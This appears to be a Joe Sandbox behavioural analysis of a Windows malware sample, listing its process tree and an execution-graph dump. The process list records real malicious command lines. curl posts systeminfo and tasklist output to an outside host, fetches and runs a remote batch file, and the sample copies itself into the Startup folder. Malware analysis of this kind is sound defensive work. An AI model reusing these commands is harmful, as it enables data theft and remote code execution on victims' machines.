      Start date:12/12/2024
      Path:C:\Users\user\Desktop\file.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\file.exe"
      Imagebase:0x1e0000
      File size:920'064 bytes
      MD5 hash:5950611ED70F90B758610609E2AEE8E6
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Target ID:1
      Start time:10:46:08
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:2
      Start time:10:46:08
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:4
      Start time:10:46:09
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\systeminfo.exe
      Wow64 process (32bit):true
      Commandline:systeminfo
      Imagebase:0x9c0000
      File size:76'800 bytes
      MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:6
      Start time:10:46:10
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\tasklist.exe
      Wow64 process (32bit):true
      Commandline:tasklist
      Imagebase:0x1b0000
      File size:79'360 bytes
      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:7
      Start time:10:46:11
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\curl.exe
      Wow64 process (32bit):true
      Commandline:curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
      Imagebase:0xb10000
      File size:470'528 bytes
      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:8
      Start time:10:46:11
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:9
      Start time:10:46:15
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\curl.exe
      Wow64 process (32bit):true
      Commandline:curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
      Imagebase:0xb10000
      File size:470'528 bytes
      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:10
      Start time:10:46:15
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:11
      Start time:10:46:18
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:12
      Start time:10:46:18
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\curl.exe
      Wow64 process (32bit):true
      Commandline:curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
      Imagebase:0xb10000
      File size:470'528 bytes
      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:13
      Start time:10:46:18
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:14
      Start time:10:46:18
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:15
      Start time:10:46:21
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:16
      Start time:10:46:21
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:17
      Start time:10:46:21
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\curl.exe
      Wow64 process (32bit):true
      Commandline:curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
      Imagebase:0xb10000
      File size:470'528 bytes
      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:18
      Start time:10:46:21
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:20
      Start time:10:46:29
      Start date:12/12/2024
      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
      Imagebase:0x540000
      File size:920'064 bytes
      MD5 hash:5950611ED70F90B758610609E2AEE8E6
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Antivirus matches:
      • Detection: 100%, Joe Sandbox ML
      • Detection: 29%, ReversingLabs
      Has exited:false

      Target ID:21
      Start time:10:46:30
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:22
      Start time:10:46:30
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:23
      Start time:10:46:30
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\systeminfo.exe
      Wow64 process (32bit):true
      Commandline:systeminfo
      Imagebase:0x9c0000
      File size:76'800 bytes
      MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:24
      Start time:10:46:30
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\tasklist.exe
      Wow64 process (32bit):true
      Commandline:tasklist
      Imagebase:0x1b0000
      File size:79'360 bytes
      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:25
      Start time:10:46:31
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\curl.exe
      Wow64 process (32bit):true
      Commandline:curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
      Imagebase:0xb10000
      File size:470'528 bytes
      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:26
      Start time:10:46:31
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:27
      Start time:10:46:34
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\curl.exe
      Wow64 process (32bit):true
      Commandline:curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
      Imagebase:0xb10000
      File size:470'528 bytes
      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:28
      Start time:10:46:34
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:29
      Start time:10:46:36
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\curl.exe
      Wow64 process (32bit):true
      Commandline:curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
      Imagebase:0xb10000
      File size:470'528 bytes
      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:30
      Start time:10:46:36
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:31
      Start time:10:46:39
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\cmd.exe
      Wow64 process (32bit):true
      Commandline:cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt
      Imagebase:0x790000
      File size:236'544 bytes
      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:32
      Start time:10:46:39
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:33
      Start time:10:46:39
      Start date:12/12/2024
      Path:C:\Windows\SysWOW64\curl.exe
      Wow64 process (32bit):true
      Commandline:curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
      Imagebase:0xb10000
      File size:470'528 bytes
      MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:34
      Start time:10:46:39
      Start date:12/12/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6d64d0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      Reset < >

        Execution Graph

        Execution Coverage:2.2%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:4.9%
        Total number of Nodes:1634
        Total number of Limit Nodes:39
        execution_graph 94862 1ef7bf 94863 1efcb6 94862->94863 94864 1ef7d3 94862->94864 94967 1eaceb 23 API calls messages 94863->94967 94866 1efcc2 94864->94866 94897 1ffddb 94864->94897 94968 1eaceb 23 API calls messages 94866->94968 94869 1ef7e5 94869->94866 94870 1ef83e 94869->94870 94871 1efd3d 94869->94871 94896 1eed9d messages 94870->94896 94907 1f1310 94870->94907 94969 251155 22 API calls 94871->94969 94874 1ffddb 22 API calls 94894 1eec76 messages 94874->94894 94876 1efef7 94881 1ea8c7 22 API calls 94876->94881 94876->94896 94878 234600 94878->94896 94970 1ea8c7 94878->94970 94879 234b0b 94975 25359c 82 API calls __wsopen_s 94879->94975 94881->94896 94883 1ea8c7 22 API calls 94883->94894 94886 200242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94886->94894 94887 1efbe3 94889 234bdc 94887->94889 94895 1ef3ae messages 94887->94895 94887->94896 94888 1ea961 22 API calls 94888->94894 94976 25359c 82 API calls __wsopen_s 94889->94976 94891 234beb 94977 25359c 82 API calls __wsopen_s 94891->94977 94892 2001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 94892->94894 94893 2000a3 29 API calls pre_c_initialization 94893->94894 94894->94874 94894->94876 94894->94878 94894->94879 94894->94883 94894->94886 94894->94887 94894->94888 94894->94891 94894->94892 94894->94893 94894->94895 94894->94896 94965 1f01e0 361 API calls 2 library calls 94894->94965 94966 1f06a0 41 API calls messages 94894->94966 94895->94896 94974 25359c 82 API calls __wsopen_s 94895->94974 94901 1ffde0 94897->94901 94899 1ffdfa 94899->94869 94901->94899 94903 1ffdfc 94901->94903 94978 20ea0c 94901->94978 94985 204ead 7 API calls 2 library calls 94901->94985 94902 20066d 94987 2032a4 RaiseException 94902->94987 94903->94902 94986 2032a4 RaiseException 94903->94986 94906 20068a 94906->94869 94908 1f1376 94907->94908 94909 1f17b0 94907->94909 94910 236331 94908->94910 94911 1f1390 94908->94911 95143 200242 5 API calls __Init_thread_wait 94909->95143 95154 26709c 361 API calls 94910->95154 94990 1f1940 94911->94990 94915 1f17ba 94922 1f17fb 94915->94922 95144 1e9cb3 94915->95144 94917 23633d 94917->94894 94918 1f1940 9 API calls 94920 1f13b6 94918->94920 94920->94922 94924 1f13ec 94920->94924 94921 1f17d4 95150 2001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94921->95150 94923 236346 94922->94923 94925 1f182c 94922->94925 95155 25359c 82 API calls __wsopen_s 94923->95155 94924->94923 94947 1f1408 __fread_nolock 94924->94947 95151 1eaceb 23 API calls messages 94925->95151 94928 1f1839 95152 1fd217 361 API calls 94928->95152 94930 23636e 95156 25359c 82 API calls __wsopen_s 94930->95156 94932 1f152f 94934 2363d1 94932->94934 94935 1f153c 94932->94935 95158 265745 54 API calls _wcslen 94934->95158 94937 1f1940 9 API calls 94935->94937 94938 1f1549 94937->94938 94944 1f1940 9 API calls 94938->94944 94953 1f15c7 messages 94938->94953 94939 1ffddb 22 API calls 94939->94947 94940 1f1872 95153 1ffaeb 23 API calls 94940->95153 94943 1f171d 94943->94894 94951 1f1563 94944->94951 94947->94928 94947->94930 94947->94932 94947->94939 94952 2363b2 94947->94952 94947->94953 95000 1eec40 94947->95000 95132 1ffe0b 94947->95132 94948 1f167b messages 94948->94943 95142 1fce17 22 API calls messages 94948->95142 94950 1f1940 9 API calls 94950->94953 94951->94953 94955 1ea8c7 22 API calls 94951->94955 95157 25359c 82 API calls __wsopen_s 94952->95157 94953->94940 94953->94948 94953->94950 95024 1ff645 94953->95024 95031 255c5a 94953->95031 95036 26ab67 94953->95036 95039 26abf7 94953->95039 95044 25eeed 94953->95044 95053 255c07 94953->95053 95060 2584df 94953->95060 95079 1fe763 94953->95079 95098 26d74d 94953->95098 95159 25359c 82 API calls __wsopen_s 94953->95159 94955->94953 94965->94894 94966->94894 94967->94866 94968->94871 94969->94896 94971 1ea8ea __fread_nolock 94970->94971 94972 1ea8db 94970->94972 94971->94896 94972->94971 94973 1ffe0b 22 API calls 94972->94973 94973->94971 94974->94896 94975->94896 94976->94891 94977->94896 94983 213820 __dosmaperr 94978->94983 94979 21385e 94989 20f2d9 20 API calls __dosmaperr 94979->94989 94981 213849 RtlAllocateHeap 94982 21385c 94981->94982 94981->94983 94982->94901 94983->94979 94983->94981 94988 204ead 7 API calls 2 library calls 94983->94988 94985->94901 94986->94902 94987->94906 94988->94983 94989->94982 94991 1f195d 94990->94991 94992 1f1981 94990->94992 94999 1f13a0 94991->94999 95162 200242 5 API calls __Init_thread_wait 94991->95162 95160 200242 5 API calls __Init_thread_wait 94992->95160 94995 1f198b 94995->94991 95161 2001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94995->95161 94996 1f8727 94996->94999 95163 2001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94996->95163 94999->94918 95019 1eec76 messages 95000->95019 95001 200242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95001->95019 95002 2001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95002->95019 95004 1efef7 95011 1ea8c7 22 API calls 95004->95011 95017 1eed9d messages 95004->95017 95006 1ffddb 22 API calls 95006->95019 95007 1ea8c7 22 API calls 95007->95019 95008 234600 95013 1ea8c7 22 API calls 95008->95013 95008->95017 95009 234b0b 95167 25359c 82 API calls __wsopen_s 95009->95167 95011->95017 95013->95017 95015 1efbe3 95015->95017 95018 234bdc 95015->95018 95023 1ef3ae messages 95015->95023 95016 1ea961 22 API calls 95016->95019 95017->94947 95168 25359c 82 API calls __wsopen_s 95018->95168 95019->95001 95019->95002 95019->95004 95019->95006 95019->95007 95019->95008 95019->95009 95019->95015 95019->95016 95019->95017 95020 2000a3 29 API calls pre_c_initialization 95019->95020 95022 234beb 95019->95022 95019->95023 95164 1f01e0 361 API calls 2 library calls 95019->95164 95165 1f06a0 41 API calls messages 95019->95165 95020->95019 95169 25359c 82 API calls __wsopen_s 95022->95169 95023->95017 95166 25359c 82 API calls __wsopen_s 95023->95166 95170 1eb567 95024->95170 95026 1ff659 95027 1ff661 timeGetTime 95026->95027 95028 23f2dc Sleep 95026->95028 95029 1eb567 39 API calls 95027->95029 95030 1ff677 95029->95030 95030->94953 95176 1e7510 95031->95176 95035 255c77 95035->94953 95208 26aff9 95036->95208 95040 26aff9 217 API calls 95039->95040 95042 26ac0c 95040->95042 95041 26ac54 95041->94953 95042->95041 95457 1eaceb 23 API calls messages 95042->95457 95045 1ffe0b 22 API calls 95044->95045 95046 25eefe 95045->95046 95458 1e5722 95046->95458 95049 1e7510 53 API calls 95050 25ef1f GetEnvironmentVariableW 95049->95050 95461 250c50 95050->95461 95052 25ef3c messages 95052->94953 95054 1e7510 53 API calls 95053->95054 95055 255c1d 95054->95055 95467 24d3a9 95055->95467 95057 255c25 95058 255c29 GetLastError 95057->95058 95059 255c3e 95057->95059 95058->95059 95059->94953 95061 1ea961 22 API calls 95060->95061 95062 2584f0 95061->95062 95063 1ffe0b 22 API calls 95062->95063 95064 2584fa 95063->95064 95065 1e5722 22 API calls 95064->95065 95066 258504 95065->95066 95067 1e7510 53 API calls 95066->95067 95068 258513 95067->95068 95069 1e3aa2 23 API calls 95068->95069 95070 25851e 95069->95070 95071 1e7510 53 API calls 95070->95071 95072 25852b 95071->95072 95073 1e7510 53 API calls 95072->95073 95074 25853d 95073->95074 95075 1e7510 53 API calls 95074->95075 95076 258552 GetPrivateProfileStringW 95075->95076 95077 1e9c6e 22 API calls 95076->95077 95078 258575 messages 95077->95078 95078->94953 95080 1e7510 53 API calls 95079->95080 95081 1fe78d 95080->95081 95613 1fedcd 95081->95613 95083 1fe7a4 95084 1eb567 39 API calls 95083->95084 95094 1febc0 _wcslen 95083->95094 95084->95094 95087 1fed33 43 API calls 95087->95094 95090 1e9c6e 22 API calls 95090->95094 95091 1eb567 39 API calls 95091->95094 95092 1fed20 95092->94953 95093 1e7510 53 API calls 95093->95094 95094->95087 95094->95090 95094->95091 95094->95092 95094->95093 95095 1e6b57 22 API calls 95094->95095 95618 1e3837 95094->95618 95628 1e30f2 95094->95628 95632 204a28 40 API calls 3 library calls 95094->95632 95633 1e6270 95094->95633 95638 1e49bd 22 API calls __fread_nolock 95094->95638 95639 1e62b5 95094->95639 95095->95094 95099 1e6270 22 API calls 95098->95099 95100 26d76d 95099->95100 95101 1ffe0b 22 API calls 95100->95101 95102 26d778 95101->95102 95103 1e5722 22 API calls 95102->95103 95104 26d783 95103->95104 95105 1ffe0b 22 API calls 95104->95105 95106 26d789 95105->95106 95107 1e5722 22 API calls 95106->95107 95108 26d794 95107->95108 95109 1e7510 53 API calls 95108->95109 95110 26d7a0 95109->95110 95111 1ea961 22 API calls 95110->95111 95112 26d7ac 95111->95112 95113 1e9cb3 22 API calls 95112->95113 95114 26d7c3 95113->95114 95672 2494bc 95114->95672 95116 26d9a2 95117 26d9b4 95116->95117 95119 1e6373 22 API calls 95116->95119 95120 1e62b5 22 API calls 95117->95120 95119->95117 95123 26d9c1 messages 95120->95123 95121 1e6373 22 API calls 95122 26d7e5 95121->95122 95122->95116 95122->95121 95125 1e6d25 22 API calls 95122->95125 95126 1e4c6d 22 API calls 95122->95126 95127 1eb567 39 API calls 95122->95127 95128 1e7510 53 API calls 95122->95128 95130 1e33c6 22 API calls 95122->95130 95131 1ffb21 51 API calls 95122->95131 95676 24919d 22 API calls 95122->95676 95677 1e49bd 22 API calls __fread_nolock 95122->95677 95678 1eb6b5 39 API calls 95122->95678 95123->94953 95125->95122 95126->95122 95127->95122 95128->95122 95130->95122 95131->95122 95135 1ffddb 95132->95135 95133 20ea0c ___std_exception_copy 21 API calls 95133->95135 95134 1ffdfa 95134->94947 95135->95133 95135->95134 95138 1ffdfc 95135->95138 95679 204ead 7 API calls 2 library calls 95135->95679 95137 20066d 95681 2032a4 RaiseException 95137->95681 95138->95137 95680 2032a4 RaiseException 95138->95680 95141 20068a 95141->94947 95142->94948 95143->94915 95145 1e9cc2 _wcslen 95144->95145 95146 1ffe0b 22 API calls 95145->95146 95147 1e9cea __fread_nolock 95146->95147 95148 1ffddb 22 API calls 95147->95148 95149 1e9d00 95148->95149 95149->94921 95150->94922 95151->94928 95152->94940 95153->94940 95154->94917 95155->94953 95156->94953 95157->94953 95158->94951 95159->94953 95160->94995 95161->94991 95162->94996 95163->94999 95164->95019 95165->95019 95166->95017 95167->95017 95168->95022 95169->95017 95171 1eb578 95170->95171 95172 1eb57f 95170->95172 95171->95172 95175 2062d1 39 API calls _strftime 95171->95175 95172->95026 95174 1eb5c2 95174->95026 95175->95174 95177 1e7525 95176->95177 95178 1e7522 95176->95178 95179 1e752d 95177->95179 95180 1e755b 95177->95180 95199 24dbbe lstrlenW 95178->95199 95204 2051c6 26 API calls 95179->95204 95181 2250f6 95180->95181 95184 1e756d 95180->95184 95191 22500f 95180->95191 95207 205183 26 API calls 95181->95207 95205 1ffb21 51 API calls 95184->95205 95185 1e753d 95188 1ffddb 22 API calls 95185->95188 95186 22510e 95186->95186 95190 1e7547 95188->95190 95192 1e9cb3 22 API calls 95190->95192 95193 1ffe0b 22 API calls 95191->95193 95198 225088 95191->95198 95192->95178 95194 225058 95193->95194 95195 1ffddb 22 API calls 95194->95195 95196 22507f 95195->95196 95197 1e9cb3 22 API calls 95196->95197 95197->95198 95206 1ffb21 51 API calls 95198->95206 95200 24dc06 95199->95200 95201 24dbdc GetFileAttributesW 95199->95201 95200->95035 95201->95200 95202 24dbe8 FindFirstFileW 95201->95202 95202->95200 95203 24dbf9 FindClose 95202->95203 95203->95200 95204->95185 95205->95185 95206->95181 95207->95186 95209 26b01d ___scrt_fastfail 95208->95209 95210 26b094 95209->95210 95211 26b058 95209->95211 